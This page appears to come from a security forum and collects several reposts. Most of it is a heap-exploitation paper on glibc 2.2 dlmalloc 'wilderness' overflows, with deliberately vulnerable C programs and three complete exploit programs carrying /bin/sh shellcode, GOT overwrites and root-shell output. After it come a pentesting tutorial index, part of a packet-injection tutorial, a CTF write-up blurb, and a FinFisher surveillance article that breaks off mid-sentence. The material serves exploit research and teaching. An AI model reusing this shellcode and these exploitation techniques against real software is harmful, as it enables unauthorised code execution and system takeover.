wilderness is not large enough to handle the request, it is extended with sbrk() and split as described above. This behaviour means that the wilderness will always exist, and furthermore, its data section will never be used. This is called wilderness preservation and as such, the wilderness is treated as the last resort in allocating a chunk of memory [4]. Consider the following example: /* START wilderness.c */ #include <stdio.h> int main(int argc, char *argv[]) { char *first, *second; first = (char *) malloc(1020); /* [A] */ strcpy(first, argv[1]); /* [B] */ second = (char *) malloc(1020); /* [C] */ strcpy(second, "polygoria!"); printf("%p | %s\n", first, second); } /* END wilderness.c */ It can be logically deduced that since no previous calls to free() have been made our malloc() requests are going to be serviced by the existing wilderness chunk. The wilderness is split in two at [A], one chunk of 1024 bytes (1020 + 4 for the size field) becomes the 'first' buffer, while the remaining space is used for the new wilderness. This same process happens again at [C]. Keep in mind that the prev_size field is not used by dlmalloc if the previous chunk is allocated, and in that situation can become part of the data of the previous chunk to decrease wastage. The wilderness chunk does not utilize prev_size (there is no possibility of the top chunk being consolidated) meaning it is included at the end of the 'first' buffer at [A] as part of its 1020 bytes of data. Again, the same applies to the 'second' buffer at [C]. The wilderness chunk being handled specially by the dlmalloc system led to Michel "MaXX" Kaempf stating in his 'Vudo malloc tricks' [2] article, "The wilderness chunk is one of the most dangerous opponents of the attacker who tries to exploit heap mismanagement". It is this special handling of the wilderness that we will be manipulating in our exploits, turning the dangerous opponent into, perhaps, an interesting conquest. - ------------------------------------ - ---- Exploiting the wilderness ----- - ---- Exploiting the wilderness with malloc() Looking at our sample code above we can see that a typical buffer overflow exists at [B]. However, in this situation we are unable to use the traditional unlink technique due to the overflowed buffer being contiguous to the wilderness and the lack of a relevant call to free(). This leaves us with the second call to malloc() at [C] - we will be exploiting the special code used to set up our 'second' buffer from the wilderness. Based on the knowledge that the 'first' buffer borders the wilderness, it is clear that not only can we control the prev_size and size elements of the top chunk, but also a considerable amount of space after the chunk header. This space is the top chunk's unused data area and proves crucial in forming a successful exploit. Lets have a look at the important chunk_alloc() code called from our malloc() requests: /* Try to use top chunk */ /* Require that there be a remainder, ensuring top always exists */ if ((remainder_size = chunksize(top(ar_ptr)) - nb) < (long)MINSIZE) /* [A] */ { ... malloc_extend_top(ar_ptr, nb); ... } victim = top(ar_ptr); set_head(victim, nb | PREV_INUSE); top(ar_ptr) = chunk_at_offset(victim, nb); set_head(top(ar_ptr), remainder_size | PREV_INUSE); return victim; This is the wilderness chunk code. It checks to see if the wilderness is large enough to service a request of nb bytes, then splits and recreates the top chunk as described above. If the wilderness is not large enough to hold the minimum size of a chunk (MINSIZE) after nb bytes are used, the heap is extended using malloc_extend_top(): mchunkptr old_top = top(ar_ptr); INTERNAL_SIZE_T old_top_size = chunksize(old_top); /* [B] */ char *brk; ... char *old_end = (char*)(chunk_at_offset(old_top, old_top_size)); ... brk = sbrk(nb + MINSIZE); /* [C] */ ... if (brk == old_end) { /* [D] */ ... old_top = 0; } ... /* Setup fencepost and free the old top chunk. */ if(old_top) { /* [E] */ old_top_size -= MINSIZE; set_head(chunk_at_offset(old_top, old_top_size + 2*SIZE_SZ), 0|PREV_INUSE); if(old_top_size >= MINSIZE) { /* [F] */ set_head(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ)|PREV_INUSE); set_foot(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ)); set_head_size(old_top, old_top_size); chunk_free(ar_ptr, old_top); } else { ... } } The above is a simplified version of malloc_extend_top() containing only the code we are interested in. We can see the wilderness being extended at [C] with the call to sbrk(), but more interesting is the chunk_free() request in the 'fencepost' code. A fencepost is a space of memory set up for checking purposes [5]. In the case of dlmalloc they are relatively unimportant, but the code above provides the crucial element in exploiting the wilderness with malloc(). The call to chunk_free() gives us a glimpse, a remote possibility, of using the unlink() macro in a nefarious way. As such, the chunk_free() call is looking very interesting. However, there are a number of conditions that we have to meet in order to reach the chunk_free() call reliably. Firstly, we must ensure that the if statement at [A] returns true, forcing the wilderness to be extended. Once in malloc_extend_top(), we have to trigger the fencepost code at [E]. This can be done by avoiding the if statement at [D]. Finally, we must handle the inner if statement at [F] leading to the call to chunk_free(). One other problem arises in the form of the set_head() and set_foot() calls. These could potentially destroy important data in our attack, so we must include them in our list of things to be handled. That leaves us with four items to consider just in getting to the fencepost chunk_free() call. Fortunately, all of these issues can be solved with one solution. As discussed above, we can control the wilderness' chunk header, essentialy giving us control of the values returned from chunksize() at [A] and [B]. Our solution is to set the overflowed size field of the top chunk to a negative value. Lets look at why this works: - A negative size field would trigger the first if statement at [A]. This is because remainder_size is signed, and when set to a negative number still evaluates to less than MINSIZE. - The altered size element would be used for old_top_size, meaning the old_end pointer would appear somewhere other than the actual end of the wilderness. This means the if statement at [D] returns false and the fencepost code at [E] is run. - The old_top_size variable is unsigned and would appear to be a large positive number when set to our negative size field. This means the statement at [F] returns true, as old_top_size evaluates to be much greater than MINSIZE. - The potentially destructive chunk header modifying calls would only corrupt unimportant padding within our overflowed buffer as the negative old_top_size is used for an offset. Finally, we can reach our call to chunk_free(). Lets look at the important bits: INTERNAL_SIZE_T hd = p->size; ... if (!hd & PREV_INUSE)) /* consolidate backward */ /* [A] */ { prevsz = p->prev_size; p = chunk_at_offset(p, -(long)prevsz); /* [B] */ sz += prevsz; if (p->fd == last_remainder(ar_ptr)) islr = 1; else unlink(p, bck, fwd); } The call to chunk_free() is made on old_top (our overflowed wilderness) meaning we can control p->prev_size and p->size. Backward consolidation is normally used to merge two free chunks together, but we will be using it to trigger the unlink() bug. Firstly, we need to ensure the backward consolidation code is run at [A]. As we can control p->size, we can trigger backward consolidation simply by clearing the overflowed size element's PREV_INUSE bit. From here, it is p->prev_size that becomes important. As mentioned above, p->prev_size is actually part of the buffer we're overflowing. Exploiting dlmalloc by using backwards consolidation was briefly considered in the article 'Once upon a free()' [3]. The author suggests that it is possible to create a 'fake chunk' within the overflowed buffer - that is, a fake chunk relatively negative to the overflowed chunk header. This would require setting p->prev_size to a small positive number which in turn gets complemented in to its negative counterpart at [B] (digression: please excuse my stylistic habit of replacing the more technically correct "two's complement" with "complement"). However, such a small positive number would likely contain NULL terminating bytes, effectively ending our payload before the rest of the overflow is complete. This leaves us with one other choice; creating a fake chunk relatively positive to the start of the wilderness. This can be achieved by setting p->prev_size to a small negative number, turned in to a small positive number at [B]. This would require the specially crafted forward and back pointers to be situated at the start of the wilderness' unused data area, just after the chunk header. Similar to the overflowed size variable discussed above, this is convinient as the negative number need not contain NULL bytes, allowing us to continue the payload into the data area. For the sake of the exploit, lets go with a prev_size of -4 or 0xfffffffc and an overflowed size of -16 or 0xfffffff0. Clearly, our prev_size will get turned into an offset of 4, essentialy passing the point 4 bytes past the start of the wilderness (the start being the prev_size element itself) to the unlink() macro. This means that our fake fwd pointer will be at the wilderness + 12 bytes and our bck pointer at the wilderness + 16 bytes. An overflowed size of -16 places the chunk header modifying calls safely into our padding, while still satisfying all of our other requirements. Our payload will look like this: |...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP|SSSSWWWWFFFFBBBBWWWWWWWW...| A = Target buffer that we control. Some of this will be trashed by the chunk header modifying calls, important when considering shellcode placement. P = The prev_size element of the wilderness chunk. This is part of our target buffer. We set it to -4. S = The overflowed size element of the wilderness chunk. We set it to -16. W = Unimportant parts of the wilderness. F = The fwd pointer for the call to unlink(). We set it to the target return location - 12. B = The bck pointer for the call to unlink(). We set it to the return address. We're now ready to write our exploit for the vulnerable code discussed above. Keep in mind that a malloc request for 1020 is padded up to 1024 to contain room for the size field, so we are exactly contiguous to the wilderness. $ gcc -o wilderness wilderness.c $ objdump -R wilderness | grep printf 08049650 R_386_JUMP_SLOT printf $ ./wilderness 123 0x8049680 | polygoria! /* START exploit.c */ #include <string.h> #include <stdlib.h> #include <unistd.h> #define RETLOC 0x08049650 /* GOT entry for printf */ #define RETADDR 0x08049680 /* start of 'first' buffer data */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *p, *payload = (char *) malloc(1052); p = payload; memset(p, '\x90', 1052); /* Jump 12 ahead over the trashed word from unlink() */ memcpy(p, "\xeb\x0c", 2); /* We put the shellcode safely away from the possibly * corrupted area */ p += 1020 - 64 - sizeof(shellcode); memcpy(p, shellcode, sizeof(shellcode) - 1); /* Set up the prev_size and overflow size fields */ p += sizeof(shellcode) + 64 - 4; *(long *) p = -4; p += 4; *(long *) p = -16; /* Set up the fwd and bck of the fake chunk */ p += 8; *(long *) p = RETLOC - 12; p += 4; *(long *) p = RETADDR; p += 4; *(p) = '\0'; execl("./wilderness", "./wilderness", payload, NULL); } /* END exploit.c */ $ gcc -o exploit exploit.c $ ./exploit sh-2.05a# - ---- Exploiting the wilderness with an off-by-one Lets modify our original vulnerable code to contain an off-by-one condition: /* START wilderness2.c */ #include <stdio.h> int main(int argc, char *argv[]) { char *first, *second; int x; first = (char *) malloc(1020); for(x = 0; x <= 1020 && argv[1][x] != '\0'; x++) /* [A] */ first[x] = argv[1][x]; second = (char *) malloc(2020); /* [B] */ strcpy(second, "polygoria!"); printf("%p %p | %s\n", first, argv[1], second); } /* END wilderness2.c */ Looking at this sample code we can see the off-by-one error occuring at [A]. The loop copies 1021 bytes of argv[1] into a buffer, 'first', allocated only 1020 bytes. As the 'first' buffer was split off the top chunk in its allocation, it is exactly contiguous to the wilderness. This means that our one byte overflow destroys the least significant byte of the top chunk's size field. When exploiting off-by-one conditions involving the wilderness we will use a similar technique to that discussed above in the malloc() section; we want to trigger malloc_extend_top() in the second call to malloc() and use the fencepost code to cause an unlink() to occur. However, there are a couple of important issues that arise further to those discussed above. The first new problem is found in trying to trigger malloc_extend_top() from the wilderness code in chunk_alloc(). In order to force the heap to extend the size of the wilderness minus the size of our second request (2020) needs to be less than 16. When we controlled the entire size field in the section above this was not a problem as we could easily set a value less than 16, but since we can only control the least significant byte of the wilderness' size field we can only decrease the size by a limited amount. This means that in some situations where the wilderness is too big we cannot trigger the heap extension code. Fortunately, it is common in real world situations to have some sort of control over the size of the wilderness through attacker induced calls to malloc(). Assuming that our larger second request to malloc() will attempt to extend the heap, we now have to address the other steps in running the fencepost chunk_free() call. We know that we can comfortably reach the fencepost code as we are modifying the size element of the wilderness. The inner if statement leading to the chunk_free() is usually triggered as either our old_top_size is greater than 16, or the wilderness' size is small enough that controlling the least significant byte is enough to make old_top_size wrap around when MINSIZE is subtracted from it. Finally, the chunk header modifying calls are unimportant, so long as they occur in allocated memory as to avoid a premature segfault. The reason for this will become clear in a short while. All we have left to do is to ensure that the PREV_INUSE bit is cleared for backwards consolidation at the chunk_free(). This is made trivial by our control of the size field. Once again, as we reach the backward consolidation code it is the prev_size field that becomes important. We have already determined that we have to use a negative prev_size value to ensure our payload is not terminated by stray NULL bytes. The negative prev_size field causes the backward consolidation chunk_at_offset() call to use a positive offset from the start of the wilderness. However, unlike the above situation we do not control any of the wilderness after the overflowed least significant byte of the size field. Knowing that we can only go forward in memory at the consolidation and that we don't have any leverage on the heap, we have to shift our attention to the stack. The stack may initally seem to be an unlikely factor when considering a heap overflow, but in our case where we can only increase the values passed to unlink() it becomes quite convinient, especially in a local context. Stack addresses are much higher in memory than their heap counterparts and by correctly setting the prev_size field of the wilderness, we can force an unlink() to occur somewhere on the stack. That somewhere will be our payload as it sits in argv[1]. Using this heap-to-stack unlink() technique any possible corruption of our payload in the heap by the chunk header modifying calls is inconsequential to our exploit; the heap is only important in triggering the actual overflow, the values for unlink() and the execution of our shellcode can be handled on the stack. The correct prev_size value can be easily calculated when exploiting a local vulnerability. We can discover the address of both argv[1] and the 'first' buffer by simulating our payload and using the output of running the vulnerable program. We also know that our prev_size will be complemented into a positive offset from the start of the wilderness. To reach argv[1] at the chunk_at_offset() call we merely have to subtract the address of the start of the wilderness (the end of the 'first' buffer minus 4 for prev_size) from the address of argv[1], then complement the result. This leaves us with the following payload: |FFFFBBBBDDDDDDDDD...DDDDDDDDPPPP|SWWWWWWWWWWW...| F = The fwd pointer for the call to unlink(). We set it to the target return location - 12. B = The bck pointer for the call to unlink(). We set it to the return address. D = Shellcode and NOP padding, where we will return in argv[1]. S = The overflowed byte in the size field of the wilderness. We set it to the lowest possible value that still clears PREV_INUSE, 2. W = Unimportant parts of the wilderness. $ gcc -o wilderness2 wilderness2.c $ objdump -R wilderness2 | grep printf 08049684 R_386_JUMP_SLOT printf /* START exploit2.c */ #include <string.h> #include <stdlib.h> #include <unistd.h> #define RETLOC 0x08049684 /* GOT entry for printf */ #define ARGV1 0x01020304 /* start of argv[1], handled later */ #define FIRST 0x04030201 /* start of 'first', also handled later */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *p, *payload = (char *) malloc(1028); long prev_size; p = payload; memset(p, '\x90', 1028); *(p + 1021) = '\0'; /* Set the fwd and bck for the call to unlink() */ *(long *) p = RETLOC - 12; p += 4; *(long *) p = ARGV1 + 8; p += 4; /* Jump 12 ahead over the trashed word from unlink() */ memcpy(p, "\xeb\x0c", 2); /* Put shellcode at end of NOP sled */ p += 1012 - 4 - sizeof(shellcode); memcpy(p, shellcode, sizeof(shellcode) - 1); /* Set up the special prev_size field. We actually want to * end up pointing to 8 bytes before argv[1] to ensure the * fwd and bck are hit right, so we add 8 before * complementing. */ prev_size = -(ARGV1 - (FIRST + 1016)) + 8; p += sizeof(shellcode); *(long *) p = prev_size; /* Allow for a test condition that will not segfault the * target when getting the address of argv[1] and 'first'. * With 0xff malloc_extend_top() returns early due to error * checking. 0x02 is used to trigger the actual overflow. */ p += 4; if(argc > 1) *(char *) p = 0xff; else *(char *) p = 0x02; execl("./wilderness2", "./wilderness2", payload, NULL); } /* END exploit2.c */ $ gcc -o exploit2 exploit2.c $ ./exploit2 test 0x80496b0 0xbffffac9 | polygoria! $ cat > diffex 6,7c6,7 < #define ARGV1 0x01020304 /* start of argv[1], handled later */ < #define FIRST 0x04030201 /* start of 'first', also handled later */ - --- > #define ARGV1 0xbffffac9 /* start of argv[1] */ > #define FIRST 0x080496b0 /* start of 'first' */ $ patch exploit2.c diffex patching file exploit2.c $ gcc -o exploit2 exploit2.c $ ./exploit2 sh-2.05a# - ------------------------------------ - ---- The wilderness and free() ----- Lets now consider the following example: /* START wilderness3a.c */ #include <stdio.h> int main(int argc, char *argv[]) { char *first, *second; first = (char *) malloc(1020); strcpy(first, argv[1]); free(first); second = (char *) malloc(1020); } /* END wilderness3a.c */ Unfortunately, this situation does not appear to be exploitable. When exploiting the wilderness calls to free() are your worst enemy. This is because chunk_free() handles situations directly involving the wilderness with different code to the normal backward or forward consolidation. Although this special 'top' code has its weaknesses, it does not seem possible to either directly exploit the call to free(), nor survive it in a way possible to exploit the following call to malloc(). For those interested, lets have a quick look at why: INTERNAL_SIZE_T hd = p->size; INTERNAL_SIZE_T sz; ... mchunkptr next; INTERNAL_SIZE_T nextsz; ... sz = hd & ~PREV_INUSE; next = chunk_at_offset(p, sz); nextsz = chunksize(next); /* [A] */ if (next == top(ar_ptr)) { sz += nextsz; /* [B] */ if (!(hd & PREV_INUSE)) /* [C] */ { ... } set_head(p, sz | PREV_INUSE); /* [D] */ top(ar_ptr) = p; ... } Here we see the code from chunk_free() used to handle requests involving the wilderness. Note that the backward consolidation within the 'top' code at [C] is uninteresting as we do not control the needed prev_size element. This leaves us with the hope of using the following call to malloc() as described above. In this situation we control the value of nextsz at [A]. We can see that the chunk being freed is consolidated with the wilderness. We can control the new wilderness' size as it is adjusted with our nextsz at [B], but unfortunately, the PREV_INUSE bit is set at the call to set_head() at [D]. The reason this is a bad thing becomes clear when considering the possibilites of using backward consolidation in any future calls to malloc(); the PREV_INUSE bit needs to be cleared. Keeping with the idea of exploiting the following call to malloc() using the fencepost code, there are a few other options - all of which appear to be impossible. Firstly, forward consolidation. This is made unlikely by the fencepost chunk header modifying calls discussed above, as they usually ensure that the test for forward consolidation will fail. The frontlink() macro has been discussed [2] as another possible method of exploiting dlmalloc, but since we do not control any of the traversed chunks this technique is uninteresting. The final option was to use the fencepost chunk header modifying calls to partially overwrite a GOT entry to point into an area of memory we control. Unfortunately, all of these modifying calls are aligned, and there doesn't seem to be anything else we can do with the values we can write. Now that we have determined what is impossible, lets have a look at what we can do when involving the wilderness and free(): /* START wilderness3b.c */ #include <stdio.h> int main(int argc, char *argv[]) { char *first, *second; first = (char *) malloc(1020); second = (char *) malloc(1020); strcpy(second, argv[1]); /* [A] */ free(first); /* [B] */ free(second); } /* END wilderness3b.c */ The general aim of this contrived example is to avoid the special 'top' code discussed above. The wilderness can be overflowed at [A], but this is directly followed by a call to free(). Fortunately, the chunk to be freed is not bordering the wilderness, and thus the 'top' code is not invoked. To exploit this we will be using forward consolidation at [B], the first call to free(). /* consolidate forward */ if (!(inuse_bit_at_offset(next, nextsz))) { sz += nextsz; if (!islr && next->fd == last_remainder(ar_ptr)) { ... } else unlink(next, bck, fwd); next = chunk_at_offset(p, sz); } At the first call to free() 'next' points to our 'second' buffer. This means that the test for forward consolidation looks at the size value of the wilderness. To trigger the unlink() on our 'next' buffer we need to overflow the wilderness' size field to clear the PREV_INUSE bit. Our payload will look like this: |FFFFBBBBDDDDDDDD...DDDDDDDD|SSSSWWWWWWWWWWWWWWWW...| F = The fwd pointer for the call to unlink(). We set it to the target return location - 12. B = The bck pointer for the call to unlink(). We set it to the return address. D = Shellcode and NOP padding, where we will return. S = The overflowed size field of the wilderness chunk. A value of -4 will do. W = Unimportant parts of the wilderness. We're now ready for an exploit. $ gcc -o wilderness3b wilderness3b.c $ objdump -R wilderness3b | grep free 0804962c R_386_JUMP_SLOT free $ ltrace ./wilderness3b 1986 2>&1 | grep malloc | tail -n 1 malloc(1020) = 0x08049a58 /* START exploit3b.c */ #include <string.h> #include <stdlib.h> #include <unistd.h> #define RETLOC 0x0804962c /* GOT entry for free */ #define RETADDR 0x08049a58 /* start of 'second' buffer data */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *p, *payload = (char *) malloc(1052); p = payload; memset(p, '\x90', 1052); /* Set up the fwd and bck pointers to be unlink()'d */ *(long *) p = RETLOC - 12; p += 4; *(long *) p = RETADDR + 8; p += 4; /* Jump 12 ahead over the trashed word from unlink() */ memcpy(p, "\xeb\x0c", 2); /* Position shellcode safely at end of NOP sled */ p += 1020 - 8 - sizeof(shellcode) - 32; memcpy(p, shellcode, sizeof(shellcode) - 1); p += sizeof(shellcode) + 32; *(long *) p = -4; p += 4; *(p) = '\0'; execl("./wilderness3b", "./wilderness3b", payload, NULL); } /* END exploit3b.c */ $ gcc -o exploit3b exploit3b.c $ ./exploit3b sh-2.05a# - ------------------------------------ - ---- A word on glibc 2.3 ----------- Although exploiting our examples on a glibc 2.3 system would be an interesting activity it does not appear possible to utilize the techniques described above. Specifically, although the fencepost code exists on both platforms, the situations surrounding them are vastly different. For those genuinely interested in a more detailed explanation of the difficulties involving the fencepost code on glibc 2.3, feel free to contact me. - ------------------------------------ - ---- Final thoughts ---------------- For an overflow involving the wilderness to exist on a glibc 2.2 platform might seem a rare or esoteric occurance. However, the research presented above was not prompted by divine inspiration, but in response to a tangible need. Thus it was not so much important substance that inclined me to release this paper, but rather the hope that obscure substance might be reused for some creative good by another. - ------------------------------------ [1] http://www.phrack.org/show.php?p=61&a=6 [2] http://www.phrack.org/show.php?p=57&a=8 [3] http://www.phrack.org/show.php?p=57&a=9 [4] http://gee.cs.oswego.edu/dl/html/malloc.html [5] http://www.memorymanagement.org/glossary/f.html#fencepost - ------------------------------------ -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAkA6PcsACgkQImcz/hfgxg0F0QCeOJsU+ZFJ+d+Cg0g5lpSio11QGqQA n3z6846AfkvZ3/BXqUGmciT4Brvw =k/EC -----END PGP SIGNATURE----- Sursa: https://www.thc.org/root/docs/exploit_writing/Exploiting%20the%20wilderness.txt
-
This tutorial series is designed for those who don’t come from a programming background. Each tutorial will cover common use cases for Python scripting geared for InfoSec professionals. From “Hello World” to custom Python malware, and exploits: 0×0 – Getting Started 0×1 – Port Scanner 0×2 – Reverse Shell 0×3 – Fuzzer 0×4 – Python to EXE 0×5 – Web Requests 0×6 – Spidering 0×7 – Web Scanning and Exploitation 0×8 – Whois Automation 0×9 – Command Automation 0xA – Python for Metasploit Automation 0xB – Pseudo-Terminal 0xC – Python Malware Sursa: Python Tutorials ? Primal Security Podcast
-
[h=1]TCP Packet Injection with Python[/h] [h=2]TCP Packet Injection with Python[/h] Packet injection is the process of interfering with an established network connection by constructing arbitrary protocol packets (TCP, UDP, ...) and send them out through raw sockets it's used widely in network penetration testing such as DDoS, TCP reset attacks, port scanning... A Packet is a combination of IP header, TCP/UDP header and data: Packet = IP Header + TCP/UDP Header + Data Most operating systems that implements socket API supports packet injection, especially those based on Berkeley Sockets. Microsoft limited raw sockets capabilities to packet sniffing, after Windows XP release. This tutorial is implemented on Unix-Like operating systems. [h=3]TCP Header[/h]The TCP protocol is the most used transport protocol in the world wide web, it provides a reliable, ordered and error-checked delivery of a stream of bytes between programs running on computers connected to network. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | data | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Sequence Number (32 bits): the sequence number of the first data byte in this segment. if the SYN flag is set, the sequence number should be the initial sequence number (ISN: usually 0), and the first data byte in the first data stream should be ISN+1 (1). Acknowledgment Number (32 bits): If the ACK flag is set, this field contains the value of the next sequence number the destination machine is expecting to receive. for every packet contains data is sent, an acknowledgment packet should be received, to acknowledge that the last packet is successfully received. Data Offset (4 bits): The length of TCP header by providing the number of 32-bit words. this indicates where the data begins. Reserved (6 bits): Usually cleared to zero Control Bits (6 bits): ACK: Acknowledgment packet SYN: Request to establish a connection RST: Request to reset connection FIN: Request to interrupt (close) a connection PSH: Informs TCP that data should be sent immediately (Useful in real-time applications) URG: Urgent Pointer field is significant Window: The number of data bytes you can send before you should stop and wait for acknowledgement Checksum: used for error-checking of the header and data Urgent Pointer: If the URG control flag is set, this field is an offset from the sequence number indicating the last urgent data byte This feature is used when some information has to reach it's destination as soon as possible. Articol: TCP Packet Injection with Python | Python for Pentesting
-
[h=1]CTF write-ups[/h] There are some problems with CTF write-ups in general: they’re scattered across the interwebs they don’t usually include the original files needed to solve the challenge some of them are incomplete or skip ‘obvious’ parts of the explanation, and are therefore not as helpful for newcomers often they disappear when the owner forgets to renew their domain or shuts down their blog This repository aims to solve those problems. It’s a collection of CTF source files and write-ups that anyone can contribute to. Did you just publish a CTF write-up? Let us know, and we’ll add a link to your post — or just add the link yourself and submit a pull request. Spot an issue with a solution? Correct it, and send a pull request. Link: https://github.com/ctfs/write-ups
-
Six things we know from the latest FinFisher documents By: Kenneth Page on: 15-Aug-2014 The publishing of materials from a support server belonging to surveillance-industry giant Gamma International has provided a trove of information for technologists, security researchers and activists. This has given the world a direct insight into a tight-knit industry, which demands secrecy for themselves and their clients, but ultimately assists in the violation human rights of ordinary people without care or reproach. Now for the first time, there is solid confirmation of Gamma's activities from inside the company's own files, despite their denials, on their clients and support provided to a range of governments. The Anglo-German company Gamma International is widely known for the intrusion software suite FinFisher, which was spun off into its own German-based company "FinFisher GmbH" sometime in 2013. The 40GB dump of internal documents, brochures, pricelists, logs, and support queries were made available through a Torrent first linked to on a Reddit post by the alleged hacker, who also set up a Twitter handle posting the documents. While these documents do provide insight into FinFisher, Privacy International does not support any attempt to compromise the security of any company's network or servers. Greater transparency is needed from this sector, and from Governments on this growing industry to ensure that every businesses obligation to respect human rights is met. Some documents provide new information; others support and verify previous claims about the company. Privacy International is still reviewing and analysing all the documents, so we expect more information to come out of these documents in the near future. 1. No targeting of Germany FinFisher's command and control servers have been found in nearly 40 countries around the world. But these new documents reveal that if you want to use FinFisher products, customers can't target devices in Germany, according to a clause contained within what appears to be a generic commercial offer the company provides to all their customers. Article 21 of a commercial offer states: The BUYER hereby acknowledges that it is a strict term of this supply contract that it will not use the articles supplied in obtaining any data or software from any computer or related devices or impairing or interfering in the operation of any computer where, in either such case, there is significant link (however arising) in relation to such action or on relation to any other relevant circumstances, with Germany and hereby undertakes and warrants to FinFisher that it will not make use of the articles supplied It is an odd clause to be contained within an offer. FinFisher is designed to work on a target machine regardless of location; a key selling point of FinFisher is offering the ability of its user to monitor a target anywhere in the world. It is unclear why the buyer is specifically banned from using FinFisher to target devices in Germany, but there are a couple of reasonable possibilities. The first possibility could be that it is a condition of the German government to allow FinFisher to be based in and exported from Germany only if it is not used against German targets. It is also possible that that FinFisher itself is looking to minimize any attention they get in Germany, be it via security agencies or the press. It further could well be a legal precaution related to computer misuse legislation, designed to minimize legal accountability. Privacy International has written to the German Federal Office for Economic Affairs and Export Control (BAFA) asking for clarification, and to assess whether the German government requires or is aware of such a clause prohibiting the targeting of German devices using German-made surveillance technology exported out of the country. 2. The targeting of activists The Gamma documents also cast doubt on their own previous claims that the Bahraini Government used a stolen demonstration copy of FinFisher against pro-democracy activists. Excellent work by Bahrain Watch signals that the Bahraini Government had reportedly targeted a range of prominent Bahraini lawyers, human rights workers, and politicians. Zeroing in on specific information related to Bahrain, the group claims to have identified 77 computers of activists targeted by FinFisher. It was the allegations and technical analysis of 2012 that Gamma's products were used to spy on Bahraini pro-democracy activists that really began to show the truly invasive implications and violations associated with their technology. This new potentially damning evidence comes in the form of the communications revealed between the supposed Bahraini authorities and Gamma's support service - again an element of their comprehensive support package. Logs show requests for assistance in solving problems occurring in the deployment of the malware, including that some anti-virus programs were detecting their presence, login details were not working, the 'targets' were not appearing, and so on. These documents and the subsequent analysis by Bahrain Watch give credence to long-suspected behaviour of the Bahraini Government when it comes to targeting activists with FinFisher, and calls into question Gamma's previous statements on their relationship with Bahrain. Several of the individuals identified by Bahrain Watch are either now imprisoned or sentenced in absentia, showing the on-the-ground impact and role of surveillance technologies in the hands of repressive regimes. 3. The industry is slick Once a negligible industry in 2001, within ten years it was estimated the sector was worth approximately $5 billion annually, and growing by 20% every year. By the end of 2014, ISS World trade fairs (the so-called 'Wiretappers Ball') will have held trade fairs in Washington DC, Prague, Brasilia, Johannesburg, Dubai and Kuala Lumpur, reflecting how the industry has stretched its tentacles to all corners of the world, selling to essentially any and all governments who deem their tools 'necessary'. The Gamma documents show their own attendance at multiple exhibitions, extending beyond ISS World and into specialised security and defence exhibitions, including the "Security and Policing" fair in Farnborough, UK, the "LAAD Defence and Security Expo" in Rio, and "FBI Executives Training" in San Antonio, Texas amongst others. What is noticeable is not merely the provision of software and hardware, a lot of which was already known to those active in the area, but the sense of the industry becoming 'established' and attempting to operate like any other normal international business. The latest Gamma brochures and presentations show the slicker side of the company and can be taken as representative of the modern industry, a highly professionalised sector with PR and marketing language directed at law enforcement and government agencies, presenting surveillance products as the comprehensive solution to any tricky problem. Paying attention to 'the little things' are a sign of a well-established and professional sector, and Gamma displays this in one of their trade fair attendance spreadsheets detailing which member of staff was due to send follow-up emails to interested individuals afterwards. 4. They do more than just sell We've previously shown how surveillance companies do not only sell the products found in these brochures. Beyond developing and marketing, companies like Gamma provide an extensive consulting service, helping install the equipment, get surveillance teams up and running, and lend IT support for any technical problems the software encounters. The provision of services beyond merely supplying the initial software or hardware is strikingly illuminated by these new documents, showing first-hand evidence at the technical and customer support offered to clients. Specifically, the new documents say that the products are subject to regular updates due to technical advances in the products, "therefore an annual support contract is required to received such upgrades and updates" [FF License Renewal Template 23.01.14]. Similarly, in the leaked pricelist, line entries show charges for post-sales support and update licences for up to 5 years, showing a consistent support mechanism for the client. The training documents detail the depth of the training given by Gamma employees to their government clients. For example in the FinIntrusion Kit 2.2, clients are trained how to conduct network intrusion, how to search and identify victims, break WEP and WPA encryption, jam wireless networks, and extract usernames and passwords for everyday services like Gmail, Hotmail, and 